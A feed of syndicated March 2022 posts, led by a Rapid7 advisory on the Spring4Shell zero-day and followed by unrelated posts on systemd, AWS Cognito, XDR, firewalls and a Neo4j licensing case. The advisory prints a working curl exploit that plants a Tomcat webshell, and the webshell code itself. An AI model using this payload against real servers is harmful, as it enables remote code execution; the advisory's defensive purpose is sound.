Spring4Shell: Zero-Day Vulnerability in Spring Framework

Post Syndicated from Jake Baines original https://blog.rapid7.com/2022/03/30/spring4shell-zero-day-vulnerability-in-spring-framework/

Spring4Shell: Zero-Day Vulnerability in Spring Framework

If you are like many in the cybersecurity industry, any mention of a zero-day in an open-source software (OSS) library may cause a face-palm or audible groans, especially given the fast-follow from Log4Shell. While discovery and research is evolving, we’re posting the facts we’ve gathered and updating guidance as new information becomes available.

What Rapid7 customers can expect

Our team is continuing to investigate and validate additional information about this vulnerability and its impact. This is a quickly evolving incident, and we are researching development of both assessment capabilities for our vulnerability management and application security solutions and options for preventive controls. As additional information becomes available, we will evaluate the feasibility of vulnerability checks, attack modules, detections, and Metasploit modules.

Our team will be updating this blog continually. Our next update will be at 9 PM EDT on March 30, 2022.

Introduction

On March 30, 2022, rumors began to circulate about an unpatched remote code execution (RCE) vulnerability in Spring Framework when a Chinese-speaking researcher published a GitHub commit that contained proof-of-concept (PoC) exploit code. The exploit code targeted a zero-day vulnerability in the Spring Core module of the Spring Framework. Spring is maintained by Spring.io (a subsidiary of VMWare) and is used by many Java-based enterprise software frameworks. The vulnerability in the leaked proof of concept, which appeared to allow unauthenticated attackers to execute code on target systems, was quickly deleted.

Spring4Shell: Zero-Day Vulnerability in Spring Framework

A lot of confusion followed for several reasons:

  • The researcher’s original technical writeup needed to be translated.
  • The vulnerability (and proof of concept) isn’t exploitable with out-of-the-box installations of Spring Framework. The application has to use specific functionality, which we explain below.
  • A completely different unauthenticated RCE vulnerability was published yesterday (March 29, 2022) for Spring Cloud, which led some in the community to conflate the two unrelated vulnerabilities.

Rapid7’s research team has confirmed the zero-day vulnerability is real and provides unauthenticated remote code execution. Proof-of-concept exploits exist, but it’s currently unclear which real-world applications use the vulnerable functionality. This code ends up resulting in widespread exploitation or no exploitation at all, depending on how the features are used.

Recreating exploitation

The vulnerability appears to affect functions that use the @RequestMapping annotation and POJO (Plain Old Java Object) parameters. Here is an example we hacked into a Springframework MVC demonstration:

package net.javaguides.springmvc.helloworld.controller;

import org.springframework.stereotype.Controller;
import org.springframework.web.bind.annotation.InitBinder;
import org.springframework.web.bind.annotation.RequestMapping;

import net.javaguides.springmvc.helloworld.model.HelloWorld;

/**
 * @author Ramesh Fadatare
 */
@Controller
public class HelloWorldController {

	@RequestMapping("/rapid7")
	public void vulnerable(HelloWorld model) {
	}
}

Here we have a controller (HelloWorldController) that, when loaded into Tomcat, will handle HTTP requests to http://name/appname/rapid7. The function that handles the request is called vulnerable and has a POJO parameter HelloWorld. Here, HelloWorld is stripped down but POJO can be quite complicated if need be:

package net.javaguides.springmvc.helloworld.model;

public class HelloWorld {
	private String message;
}

And that’s it. That’s the entire exploitable condition, from at least Spring Framework versions 4.3.0 through 5.3.15. (We have not explored further back than 4.3.0.)

If we compile the project and host it on Tomcat, we can then exploit it with the following curl command. Note the following uses the exact same payload used by the original proof of concept created by the researcher (more on the payload later):

curl -v -d "class.module.classLoader.resources.context.parent.pipeline
.first.pattern=%25%7Bc2%7Di%20if(%22j%22.equals(request.getParameter(%
22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRunt
ime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%
20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20
while((a%3Din.read(b))3D-1)%7B%20out.println(new%20String(b))%3B%20%7
D%20%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context
.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources
.context.parent.pipeline.first.directory=webapps/ROOT&class.module.cl
assLoader.resources.context.parent.pipeline.first.prefix=tomcatwar&cl
ass.module.classLoader.resources.context.parent.pipeline.first.fileDat
eFormat=" http://localhost:8080/springmvc5-helloworld-exmaple-0.0.1-
SNAPSHOT/rapid7

This payload drops a password protected webshell in the Tomcat ROOT directory called tomcatwar.jsp, and it looks like this:

- if("j".equals(request.getParameter("pwd"))){ java.io.InputStream in
= -.getRuntime().exec(request.getParameter("cmd")).getInputStream();
int a = -1; byte[] b = new byte[2048]; while((a=in.read(b))3D-1){ out.
println(new String(b)); } } -

Attackers can then invoke commands. Here is an example of executing whoami to get albinolobster:

Spring4Shell: Zero-Day Vulnerability in Spring Framework

The Java version does appear to matter. Testing on OpenJDK 1.8.0_312 fails, but OpenJDK 11.0.14.1 works.

About the payload

The payload we’ve used is specific to Tomcat servers. It uses a technique that was popular as far back as the 2014 and alters the Tomcat server’s logging properties via ClassLoader. The payload simply redirects the logging logic to the ROOT directory and drops the file + payload. A good technical writeup can be found here.

This is just one possible payload and will not be the only one. We’re certain that malicious class-loading payloads will appear quickly.

Mitigation guidance

This zero-day vulnerability is unpatched and has no CVE assigned as of March 30, 2022. The Spring documentation for DataBinder explicitly notes:

… [T]here are potential security implications in failing to set an array of allowed fields. In the case of HTTP form POST data for example, malicious clients can attempt to subvert an application by supplying values for fields or properties that do not exist on the form. In some cases this could lead to illegal data being set on command objects or their nested objects. For this reason, it is highly recommended to specify the allowedFields property on the DataBinder.

Therefore, one line of defense would be to modify source code of custom Spring applications to ensure those field guardrails are in place. Organizations that use third-party applications susceptible to this newly discovered weakness cannot take advantage of this approach.

If your organization has a web application firewall (WAF) available, profiling any affected Spring-based applications to see what strings can be used in WAF detection rulesets would help prevent malicious attempts to exploit this weakness.

Until a patch is available, and if an organization is unable to use the above mitigations, one failsafe option is to model processes executions on systems that run these Spring-based applications and then monitor for anomalous, “post-exploitation” attempts. These should be turned into alerts and acted upon immediately via incident responders and security automation. One issue with this approach is the potential for false alarms if the modeling was not comprehensive enough.

Vulnerability disambiguation

There has been significant confusion about the zero-day vulnerability we discuss in this blog post because an unrelated vulnerability in another Spring project was published yesterday (March 29, 2022). That vulnerability, CVE-2022-22963, affects Spring Cloud Function, which is not in Spring Framework. Spring released versions 3.1.7 and 3.2.3 to address CVE-2022-22963. CVE-2022-22963 is completely unrelated to the zero-day RCE under investigation in this blog post.

Further, yet another vulnerability CVE-2022-22950 was assigned on March 28th. A fix was released on the same day. To keep things confusing, this medium-severity vulnerability (which can cause a DoS condition) DOES affect Spring Framework versions 5.3.0 to 5.3.16. This CVE is completely unrelated to the zero-day RCE under investigation in this blog post.

NEVER MISS A BLOG

Get the latest stories, expertise, and news about security today.

[$] Systemd discusses its kernel-version needs

Post Syndicated from original https://lwn.net/Articles/889610/

A query regarding the possibility of dropping support for older kernels in systemd led
to some discussion on the systemd-devel mailing list recently. As might be
guessed, exactly which kernel would be the minimum
supported, what kernel features systemd is using, and when those kernel
features became available, were all part of that conversation.
A component like systemd that is closely tied to the kernel, and the interfaces
different versions
provide, has a number of different factors to consider when making a
decision of this sort.

[Security Nation] David Rogers on IoT Security Legislation

Post Syndicated from Rapid7 original https://blog.rapid7.com/2022/03/30/security-nation-david-rogers-on-iot-security-legislation/

[Security Nation] David Rogers on IoT Security Legislation

In this episode of Security Nation, Jen and Tod chat with David Rogers, CEO at Copper Horse Ltd., about the Product Security and Telecommunications Infrastructure (PSTI) bill, a new piece of IoT security legislation in the UK. He runs through the new regulations that the bill includes for manufacturers of connected smart devices – including everything from home products to health devices – and details all the many steps it takes to get legislation like this signed into law.

Stick around for our Rapid Rundown, where Tod and Jen talk about the latest edition of Rapid7’s Vulnerability Intelligence Report, which covers all the need-to-know vulnerabilities from 2021, a year that began with SolarWinds and ended with Log4j (i.e. a VERY busy year for this sort of thing).

David Rogers

[Security Nation] David Rogers on IoT Security Legislation

David is a mobile phone and IoT security specialist who runs Copper Horse Ltd, a software and security company based in Windsor, UK. His company is currently focusing on product security for the Internet of Things, as well as future automotive cybersecurity.

David chairs the Fraud and Security Group at the GSMA and sits on the Executive Board of the Internet of Things Security Foundation. He authored the UK’s Code of Practice for Consumer IoT Security, in collaboration with UK government and industry colleagues, and is a member of the UK’s Telecoms Supply Chain Diversification Advisory Council.

He has worked in the mobile industry for over 20 years in security and engineering roles. Prior to this, he worked in the semiconductor industry. David holds an MSc in Software Engineering from the University of Oxford and a HND in Mechatronics from the University of Teesside. He lectured in Mobile Systems Security at the University of Oxford from 2012-2019 and served as a Visiting Professor in Cyber Security and Digital Forensics at York St John University.

He was awarded an MBE for services to Cyber Security in the Queen’s Birthday Honours 2019.

He blogs from https://mobilephonesecurity.org and tweets at @drogersuk.

Show notes

Interview links

Rapid Rundown links

Want More Inspiring Stories From the Security Community?

Subscribe to Security Nation Today

Enriching Amazon Cognito features with an Amazon API Gateway proxy

Post Syndicated from Mahmoud Matouk original https://aws.amazon.com/blogs/architecture/enriching-amazon-cognito-features-with-an-amazon-api-gateway-proxy/

This post was co-written with Geoff Baskwill, member of the Architecture Enabling Team at Trend Micro. At Trend Micro, we use AWS technologies to build secure solutions to help our customers improve their security posture.


This post builds on the architecture originally published in Protect public clients for Amazon Cognito with an Amazon CloudFront proxy. Read that post to learn more about public clients and why it is helpful to implement a proxy layer.

We’ll build on the idea of passing calls to Amazon Cognito through a lightweight proxy. This pattern allows you to augment identity flows in your system with additional processing without having to change the client or the backend. For example, you can use the proxy layer to protect public clients as explained in the original post. You can also use this layer to apply additional fraud detection logic to prevent fraudulent sign up, propagate events to downstream systems for monitoring or enhanced logging, and replicate certain events to another AWS Region (for example, to build high availability and multi-Region capabilities).

The solution in the original post used Amazon CloudFront, Lambda@Edge, and AWS WAF to implement protection of public clients, and hinted that there are multiple ways to do it. In this post, we explore one of these alternatives by using Amazon API Gateway and a proxy AWS Lambda function to implement the proxy to Amazon Cognito. This alternative offers improved performance and full access to request and response elements.

Solution overview

The focus of this solution is to protect public clients of the Amazon Cognito user pool.

The workflow is shown in Figure 1 and works as follows:

  1. Configure the client application (mobile or web client) to use the API Gateway endpoint as a proxy to an Amazon Cognito regional endpoint. You also create an application client in Amazon Cognito with a secret. This means that any unauthenticated API call must have the secret hash.
  2. Use a Lambda function to add a secret hash to the relevant incoming requests before passing them on to the Amazon Cognito endpoint. This function can also be used for other purposes like logging, propagation of events, or additional validation.
  3. In the Lambda function, you must have the app client secret to be able to calculate the secret hash and add it to the request. We recommend that you keep the secret in AWS Secrets Manager and cache it for the lifetime of the function.
  4. Use AWS WAF with API Gateway to enforce rate limiting, implement allow and deny lists, and apply other rules according to your security requirements.
  5. Clients that send unauthenticated API calls to the Amazon Cognito endpoint directly are blocked and dropped because of the missing secret.

Not shown: You may want to set up a custom domain and certificate for your API Gateway endpoint.

A proxy solution to the Amazon Cognito regional endpoint

Figure 1. A proxy solution to the Amazon Cognito regional endpoint

Deployment steps

You can use the following AWS CloudFormation template to deploy this proxy pattern for your existing Amazon Cognito user pool.

Note: This template references a Lambda code package from a bucket in the us-east-1 Region. For that reason, the template can be only created in us-east-1. If you need to create the proxy solution in another Region, download the template and Lambda code package, update the template to reference another Amazon Simple Storage Service (Amazon S3) bucket that you own in the desired Region, and upload the code package to that S3 bucket. Then you can deploy your modified template in the desired Region.

launch stack

This template requires the user pool ID as input and will create several resources in your AWS account to support the following proxy pattern:

  • A new application client with a secret will be added to your Amazon Cognito user pool
  • The secret will be stored in Secrets Manager and will be read from the proxy Lambda function
  • The proxy Lambda function will be used to intercept Amazon Cognito API calls and attach client-secret to applicable requests
  • The API Gateway project provides the custom proxy endpoint that is used as the Amazon Cognito endpoint in your client applications
  • An AWS WAF WebACL provides firewall protection to the API Gateway endpoint. The WebACL includes placeholder rules for Allow and Deny lists of IPs. It also includes a rate limiting rule that will block requests from IP addresses that exceed the number of allowed requests within a five-minute period (rate limit value is provided as input to the template)
  • Several helper resources will also be created like Lambda functions, necessary AWS IAM policies, and roles to allow the solution to function properly

After you create a successful stack, you can find the endpoint URL in the outputs section of your CloudFormation stack. This is the URL we use in the next section with client applications.

Note: The template and code has been simplified for demonstration purposes. If you plan to deploy this solution in production, make sure to review these resources for compliance with your security and performance requirements. For example, you might need to enable certain logs or log encryption or use a customer managed key for encryption.

Integrating your client with proxy solution

Integrate the client application with the proxy by changing the endpoint in your client application to use the endpoint URL for the proxy API Gateway. The endpoint URL and application client ID are located in the Outputs section of the CloudFormation stack.

Next, edit your client-side code to forward calls to Amazon Cognito through the proxy endpoint and use the new application client ID. For example, if you’re using the Identity SDK, you should change this property as follows.

var poolData = {
  UserPoolId: '<USER-POOL-ID>',
  ClientId: '<APP-CLIENT-ID>',
  endpoint: 'https://<APIGATEWAY-URL>'
};

If you’re using AWS Amplify, change the endpoint in the aws-exports.js file by overriding the property aws_cognito_endpoint. Or, if you configure Amplify Auth in your code, you can provide the endpoint as follows.

Amplify.Auth.configure({
  userPoolId: '<USER-POOL-ID>',
  userPoolWebClientId: '<APP-CLIENT-ID>',
  endpoint: 'https://<APIGATEWAY-URL>'
});

If you have a mobile application that uses the Amplify mobile SDK, override the endpoint in your configuration as follows (don’t include AppClientSecret parameter in your configuration).

Note that the Endpoint value contains the domain name only, not the full URL. This feature is available in the latest releases of the iOS and Android SDKs.

"CognitoUserPool": {
  "Default": {
    "AppClientId": "<APP-CLIENT-ID>",
    "Endpoint": "<APIGATEWAY-DOMAIN-NAME>",
    "PoolId": "<USER-POOL-ID>",
    "Region": "<REGION>"
  }
}
WARNING: If you do an amplify push or amplify pull operation, the Amplify CLI overwrites customizations to the awsconfiguration.json and amplifyconfiguration.json files. You must manually re-apply the Endpoint customization and remove the AppClientSecret if you use the CLI to modify your cloud backend.

When to use this pattern

The same guidance for using this pattern applies as in the original post.

You may prefer this solution if you are familiar with API Gateway or if you want to take advantage of the following:

  • Use CloudWatch metrics from API Gateway to monitor the behavior and health of your Amazon Cognito user pool.
  • Find and examine logs from your Lambda proxy function in the Region where you have deployed this solution.
  • Deploy your proxy function into an Amazon Virtual Private Cloud (Amazon VPC) and access sensitive data or services in the Amazon VPC or through Amazon VPC endpoints.
  • Have full access to request and response in the proxy Lambda function

Extend the proxy features

Now that you are intercepting all of the API requests to Amazon Cognito, add features to your identity layer:

  • Emit events using Amazon EventBridge when user data changes. You can do this when the proxy function receives mutating actions like UpdateUserAttribute (among others) and Amazon Cognito processes the request successfully.
  • Implement more complex rate limiting than what AWS WAF supports, like per-user rate limits regardless of where IP address requests are coming from. This can also be extended to include fraud detection, request input validation, and integration with third-party security tools.
  • Build a geo-redundant user pool that transparently mitigates regional failures by replicating mutating actions to an Amazon Cognito user pool in another Region.

Limitations

This solution has the same limitations highlighted in the original post. Keep in mind that resourceful authenticated users can still make requests to the Amazon Cognito API directly using the access token they obtained from authentication. If you want to prevent this from happening, adjust the proxy to avoid returning the access token to clients or return an encrypted version of the token.

Conclusion

In this post, we explored an alternative solution that implements a thin proxy to Amazon Cognito endpoint. This allows you to protect your application against unwanted requests and enrich your identity flows with additional logging, event propagation, validations, and more.

Ready to get started? If you have questions about this post, start a new thread on the Amazon Cognito forum or contact AWS Support.

Demystifying XDR: The Time for Implementation Is Now

Post Syndicated from Jesse Mack original https://blog.rapid7.com/2022/03/30/demystifying-xdr-the-time-for-implementation-is-now/

Demystifying XDR: The Time for Implementation Is Now

In previous installments of our conversation with Forrester Analyst Allie Mellen on all things extended detection and response (XDR), she helped us understand not only the foundations of the product category and its relationship with security information and event management (SIEM), but also the role of automation and curated detections. But Sam Adams, Rapid’s VP of Detection and Response, still has a few key questions, the first of which is: What do XDR implementations actually look like today?

A tale of two XDRs

Allie is quick to point out what XDR looks like in practice can run the gamut, but that said, there are two broad categories that most XDR implementations among security operations centers (SOCs) fall under right now.

XDR all-stars

These are the organizations that “are very advanced in their XDR journey,” Allie said.”They are design partners for XDR; they’re working very closely with the vendors that they’re using.” These are the kinds of organizations that are looking to XDR to fully replace their SIEM, or who are at least somewhat close to that stage of maturity.

To that end, these security teams are also integrating their XDR tools with identity and access management, cloud security, and other products to create a holistic vision.

Targeted users

The other major group of XDR adopters is those utilizing the tool to achieve more targeted outcomes. They typically purchase an XDR solution and have this running alongside their SIEM — but Allie points out that this model comes with some points of friction.

“The end users see the overlapping use cases between SIEM and XDR,” she said, “but the outcomes that XDR is able to provide are what’s differentiating it from just putting all of that data into the SIEM and looking for outcomes.”



Demystifying XDR: The Time for Implementation Is Now

The common ground

This relatively stratified picture of XDR implementations is due in large part to how early-stage the product category is, Allie notes.

“There’s no one way to implement XDR,” she said. “It’s kind of a mishmash of the different products that the vendor supports.”

That picture is likely to become a lot clearer and more focused as the category matures — and Allie is already starting to see some common threads emerge. She notes that most implementations have a couple things in common:

  • They are at some level replacing endpoint detection and response (EDR) by incorporating more sources of telemetry.
  • They are augmenting (though not always fully replacing) SIEM solutions’ capabilities for detection and response.

Allie expects that over the next 5 years, XDR will continue to “siphon off” those uses cases from SIEM. The last one to fall will likely be compliance, and at that point, XDR will need to evolve to meet that use case before it can fully replace SIEM.

Why now?

That brings us to Sam’s final question for Allie: What makes now the right time for the shift to XDR to really take hold?

Allie identifies a few key drivers of the trend:

  • Market maturity: Managed detection and response (MDR) providers have been effectively doing XDR for some time now — much longer than the category has been defined. This is encouraging EDR vendors to build these capabilities directly into their platforms.
  • Incident responders’ needs: SOC teams are generally happy with EDR and SIEM tools’ capabilities, Allie says — they just need more of them. XDR’s ability to introduce a wider range of telemetry sources is appealing in this context.
  • Need for greater ROI: Let’s be real — SIEMs are expensive. Security teams are eager to get the most return possible out of the tools they are investing so much of their budget into.
  • Talent shortage: As the cybersecurity skills shortage worsens and SOCs are strapped for talent, security teams need tools that help them do more with less and drive outcomes with a leaner staff.



Demystifying XDR: The Time for Implementation Is Now

For those looking to begin their XDR journey in response to some of these trends, Allie recommends ensuring that your vendor can offer strong behavioral detections, automated response recommendations, and automated root-cause analysis, so your analysts can investigate faster.

“These three things are really critical to building a strong XDR capability,” she said,”and even if it’s a roadmap item for your vendor, that’s going to give you a good basis to build from there.”

Want more XDR insights from our conversation with Allie? Check out the full talk.

Additional reading:

Security updates for Wednesday

Post Syndicated from original https://lwn.net/Articles/889682/

Security updates have been issued by CentOS (expat, firefox, httpd, openssl, and thunderbird), Debian (cacti), Fedora (kernel, rsh, unrealircd, and xen), Mageia (kernel and kernel-linus), openSUSE (apache2, java-1_8_0-ibm, kernel, openvpn, and protobuf), Oracle (openssl), Red Hat (httpd:2.4, kernel, kpatch-patch, and openssl), SUSE (apache2, java-1_7_1-ibm, java-1_8_0-ibm, kernel, openvpn, protobuf, and zlib), and Ubuntu (chromium-browser and paramiko).

New – Cloud NGFW for AWS

Post Syndicated from Jeff Barr original https://aws.amazon.com/blogs/aws/new-cloud-ngfw-for-aws/

In 2018 I wrote about AWS Firewall Manager (Central Management for Your Web Application Portfolio) and showed you how you could host multiple applications, perhaps spanning multiple AWS accounts and regions, while maintaining centralized control over your organization’s security settings and profile. In the same way that Amazon Relational Database Service (RDS) supports multiple database engines, Firewall Manager supports multiple types of firewalls: AWS Web Application Firewall, AWS Shield Advanced, VPC security groups, AWS Network Firewall, and Amazon Route 53 DNS Resolver DNS Firewall.

Cloud NGFW for AWS
Today we are introducing support for Palo Alto Networks Cloud NGFW in Firewall Manager. You can now use Firewall Manager to centrally provision & manage your Cloud next-generation firewall resources (also called NGFWs) and monitor for non-compliant configurations, all across multiple accounts and Virtual Private Clouds (VPCs). You get the best-in-class security features offered by Cloud NGFW as a managed service wrapped inside a native AWS experience, with no hardware hassles, no software upgrades, and pay-as-you-go pricing. You can focus on keeping your organization safe and secure, even as you add, change, and remove AWS resources.

Palo Alto Networks pioneered the concept of deep packet inspection in their NGFWs. Cloud NGFW for AWS can decrypt network packets, look inside, and then identify applications using signatures, protocol decoding, behavioral analysis, and heuristics. This gives you the ability to implement fine-grained, application-centric security management that is more effective than simpler models that are based solely on ports, protocols, and IP addresses. Using Advanced URL Filtering, you can create rules that take advantage of curated lists of sites (known as feeds) that distribute viruses, spyware, and other types of malware, and you have many other options for identifying and handling desirable and undesirable network traffic. Finally, Threat Prevention stops known vulnerability exploits, malware, and command-and-control communication.

The integration lets you choose the deployment model that works best with your network architecture:

Centralized – One firewall running in a centralized “inspection” VPC.

Distributed – Multiple firewalls, generally one for each VPC within the scope managed by Cloud NGFW for AWS.

Cloud NGFW protects outbound, inbound, and VPC-to-VPC traffic. We are launching with support for all traffic directions.

AWS Inside
In addition to centralized provisioning and management via Firewall Manager, Cloud NGFW for AWS makes use of many other parts of AWS. For example:

AWS Marketplace – The product is available in SaaS form on AWS Marketplace with pricing based on hours of firewall usage, traffic processed, and security features used. Cloud NGFW for AWS is deployed on a highly available compute cluster that scales up and down with traffic.

AWS Organizations – To list and identify new and existing AWS accounts and to drive consistent, automated cross-account deployment.

AWS Identity and Access Management (IAM) – To create cross-account roles for Cloud NGFW to access log destinations and certificates in AWS Secrets Manager.

AWS Config – To capture changes to AWS resources such as VPCs, VPC route configurations, and firewalls.

AWS CloudFormation – To run a StackSet that onboards each new AWS account by creating the IAM roles.

Amazon S3, Amazon CloudWatch, Amazon Kinesis – Destinations for log files and records.

Gateway Load Balancer – To provide resiliency, scale, and availability for the NGFWs.

AWS Secrets Manager – To store SSL certificates in support of deep packet inspection.

Cloud NGFW for AWS Concepts
Before we dive in and set up a firewall, let’s review a few important concepts:

Tenant – An installation of Cloud NGFW for AWS associated with an AWS customer account. Each purchase from AWS Marketplace creates a new tenant.

NGFW – A firewall resource that spans multiple AWS Availability Zones and is dedicated to a single VPC.

Rulestack – A set of rules that defines the access controls and threat protections for one or more NGFWs.

Global Rulestack – Represented by an FMS policy, contains rules that apply to all of the NGFWs in an AWS Organization.

Getting Started with Cloud NGFW for AWS
Instead of my usual step-by-step walk-through, I am going to show you the highlights of the purchasing and setup process. For a complete guide, read Getting Started with Cloud NGFW for AWS.

I start by visiting the Cloud NGFW Pay-As-You-Go listing in AWS Marketplace. I review the pricing and terms, click Continue to Subscribe, and proceed through the subscription process.

After I subscribe, Cloud NGFW for AWS will send me an email with temporary credentials for the Cloud NGFW console. I use the credential to log in, and then I replace the temporary password with a long-term one:

I click Add AWS Account and enter my AWS account Id. The console will show my account and any others that I subsequently add:

The NGFW console redirects me to the AWS CloudFormation console and prompts me to create a stack. This stack sets up cross-account IAM roles, designates (but does not create) logging destinations, and lets Cloud NGFW access certificates in Secrets Manager for packet decryption.

From here, I proceed to the AWS Firewall Manager console and click Settings. I can see that my cloud NGFW tenant is ready to be associated with my account. I select the radio button next to the name of the firewall, in this case “Palo Alto Networks Cloud NGFW” and then click the Associate button. Note that the subscription status will change to Active in a few minutes.

Screenshot showing the account association process

Once the NGFW tenant is associated with my account I return to the AWS Firewall Manager console and click Security policies to proceed. There are no policies yet, and I click Create policy to make one:

I select Palo Alto Networks Cloud NGFW, choose the Distributed model, pick an AWS region, and click Next to proceed (this model will create a Cloud NGFW endpoint in each in-scope VPC):

I enter a name for my policy (Distributed-1), and select one of the Cloud NGFW firewall policies that are available to my account. I can also click Create firewall policy to navigate to the Palo Alto Networks console and step through the process of creating a new policy. Today I select grs-1:

I have many choices and options when it comes to logging. Each of the three types of logs (Traffic, Decryption, and Threat) can be routed to an S3 bucket, a CloudWatch log group, or a Kinesis Firehose delivery stream. I choose an S3 bucket and click Next to proceed:

A screenshot showing the choices for logging.

Now I choose the Availability Zones where I need endpoints. I have the option to select by name or by ID, and I can optionally designate a CIDR block within each AZ that will be used for the subnets:

The next step is to choose the scope: the set of accounts and resources that are covered by this policy. As I noted earlier, this feature works hand-in-hand with AWS Organizations and gives me multiple options to choose from:

The CloudFormation template linked above is used to create an essential IAM role in each member account. When I run it, I will need to supply values for the CloudNGFW Account ID and ExternalId parameters, both of which are available from within the Palo Alto Networks console. On the next page I can tag my newly created policy:

On the final page I review and confirm all of my choices, and click Create policy to do just that:

My policy is created right away, and it will start to list the in-scope accounts within minutes. Under the hood, AWS Firewall Manager calls Cloud NGFW APIs to create NGFWs for the VPCs in my in-scope accounts, and the global rules are automatically associated with the created NGFWs. When the NGFWs are ready to process traffic, AWS Firewall Manager creates the NGFW endpoints in the subnets.

As new AWS accounts join my organization, AWS Firewall Manager automatically ensures they are compliant by creating new NGFWs as needed.

Next I review the Cloud NGFW threat logs to see what threats are being blocked by Cloud NGFW. In this example Cloud NGFW protected my VPC against SIPVicious scanning activity:

Screenshot showing the threat log detecting SIPVicious activity

And in this example, Cloud NGFW protected my VPC against a malware download:

a screenshot showing the threat log of malware detection

Things to Know
Both AWS Firewall Manager and Cloud NGFW are regional services and my AWS Firewall Manager policy is therefore regional. Cloud NGFW is currently available in the US East (N. Virginia) and US West (N. Califormia) Regions, with plans to expand in the near future.

Jeff;

Stalking with an Apple Watch

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2022/03/stalking-with-an-apple-watch.html

The malicious uses of these technologies are scary:

Police reportedly arrived on the scene last week and found the man crouched beside the woman’s passenger side door. According to the police, the man had, at some point, wrapped his Apple Watch across the spokes of the woman’s passenger side front car wheel and then used the Watch to track her movements. When police eventually confronted him, he admitted the Watch was his. Now, he’s reportedly being charged with attaching an electronic tracking device to the woman’s vehicle.

An Erroneous Preliminary Injunction Granted in Neo4j v. PureThink

Post Syndicated from original http://ebb.org/bkuhn/blog/2022/03/30/neo4j-v-purethink-open-source-affero-gpl.html

[ A version of this article was also posted on Software
Freedom Conservancy’s blog
. ]

Bad Early Court Decision for AGPLv3 Has Not Yet Been Appealed

We at
Software Freedom Conservancy proudly and vigilantly watch out
for your rights under copyleft licenses such as the Affero GPLv3.
Toward this goal, we have studied the Neo4j, Inc. v. PureThink, LLC ongoing case in the Northern District of California , and the preliminary injunction appeal decision in
the Ninth Circuit Court this month. The case is complicated, and
we’ve seen much understandable confusion in the public discourse about the status of the case
and the impact of the Ninth Circuit’s decision to continue the trial court’s preliminary injunction while the case continues. While
it’s true that part of the summary judgment decision in the lower court bodes badly for an important provision in
AGPLv3§7¶4, the good news is that the case is not over, nor was
the appeal (decided this month) even an actual appeal of the
decision itself! This lawsuit is far from completion.

A Brief Summary of the Case So Far

The primary case in question is a dispute between Neo4j,
a proprietary
relicensing
company, against a very small company called PureThink, run by
an individual named John Mark Suhy. Studying the docket of the case, and a relevant related case, and
other available public materials, we’ve come to understand some basic facts and
events.
To paraphrase LeVar Burton, we encourage all our readers to not take our word (or anyone else’s) for it,
but instead take the time to read the dockets and come to your own
conclusions.

After canceling their formal, contractual partnership with Suhy, Neo4j alleged multiple claims
in court against Suhy and his companies. Most of these claims centered around trademark
rights regarding “Neo4j” and related marks. However, the
claims central to our concern relate to a dispute between Suhy and Neo4j regarding Suhy’s
clarification in downstream licensing of the Enterprise version that Neo4j distributed.

Specifically, Neo4j attempted to license the codebase under something they (later, in their Court filings)
dubbed the “Neo4j Sweden Software License” — which consists of a LICENSE.txt file containing
the entire text of the Affero General Public License, version 3
(“AGPLv3”) (a license that I helped write), and the
so-called
“Commons Clause”
— a toxic proprietary license. Neo4j admits that
this license mash-up (if legitimate, which we at Software Freedom
Conservancy and Suhy both dispute), is not an “open source
license”.

There are many complex issues of trademark and breach of other contracts
in this case; we agree that there are lots of
interesting issues there. However, we focus on the matter of most interest to us and many FOSS activists: Suhy’s permissions to remove of the “Commons
Clause”. Neo4j
accuses Suhy of improperly removing the “Commons Clause” from the codebase (and
subsequently redistributing the software under pure AGPLv3) in paragraph 77 of
their third amended complaint
. (Note that
Suhy denied
these allegations in court
— asserting that his removal of the “Commons Clause” was legitimate and permitted.

Neo4j filed
for summary judgment
on all the issues, and throughout their summary
judgment motion, Neo4j argued that the removal of the “Commons Clause” from
the license information in the repository (and/or
Suhy’s suggestions to others that removal of the “Commons Clause” was legitimate)
constituted behavior that the Court should enjoin or otherwise
prohibit. The Court partially granted Neo4j’s motion for summary judgment. Much of
that ruling is not particularly related to FOSS licensing questions, but
the
section regarding licensing deeply concerns us
. Specifically, to
support the Court’s order that temporarily prevents Suhy and others from saying that
the Neo4j Enterprise edition that was released under the so-called
“Neo4j Sweden Software License” is a “free and open
source” version and/or alternative to proprietary-licensed Neo4j
EE
, the Court held that removal of the “Commons Clause” was not permitted. (BTW, the court confuses “commercial” and
“proprietary” in that section — it seems they do not
understand that FOSS can be commercial as well.)

In this instance, we’re not as concerned with the names used for the software; as much as the copyleft licensing question — because it’s
the software’s license, not its name, that either assures or prevents users to exercise their fundamental software rights. Notwithstanding our disinterest
in the naming issue, we’d all likely agree that —
if “AGPLv3 WITH Commons-Clause” were a legitimate form of licensing — such a license is not FOSS.
The primary issue, therefore, is not about whether or not this software is FOSS, but whether or not the “Commons Clause” can
be legitimately removed by downstream licensees when presented with a license of “AGPLv3 WITH Commons-Clause”. We believe the Court held incorrectly by concluding that Suhy was not permitted to remove the
“Commons Clause”. “Their order that enjoins Suhy from calling the resulting code
“FOSS” — even if it’s a decision that bolsters a
minor goal of some activists — is problematic because the
underlying holding (if later upheld on appeal) could seriously harm
FOSS and copyleft.

The Confusion About the Appeal

Because this was an incomplete summary judgment and the case is ongoing,
the injunction against Suhy’s on making such statements is a preliminary injunction,
and cannot be made permanent until the case actually completes in the trial court. The
decision
by the Ninth Circuit appeals court regarding this preliminary injunction
has
been widely reported by others as an “appeal decision” on the issue of what can be called “open source”. However, this
is not an appeal of the entire summary judgment decision, and certainly not an appeal of the entire case (which
cannot even been appealed until the case completes). The Ninth Circuit decision merely affirms that Suhy
remains under the preliminary injunction (which prohibits him and his companies from taking certain actions and saying certain things publicly) while the case continues. In fact, the standard that an
appeals Court uses when considering an appeal of a preliminary injunction differs from the standard for ordinary appeals. Generally speaking, appeals Courts
are highly deferential to trial courts regarding preliminary injunctions, and appeals of actual decisions have a much more stringent standard.

The Affero GPL Right to Restriction Removal

In their partial summary judgment ruling, the lower Court erred because they rejected an
important and (in our opinion) correct counter-argument made by Suhy’s attorneys.
Specifically, Suhy’s attorneys argued that Neo4j’s license expressly
permitted the removal of the “Commons Clause” from the
license. AGPLv3 was, in fact, drafted to permit such removal in this precise fact pattern.

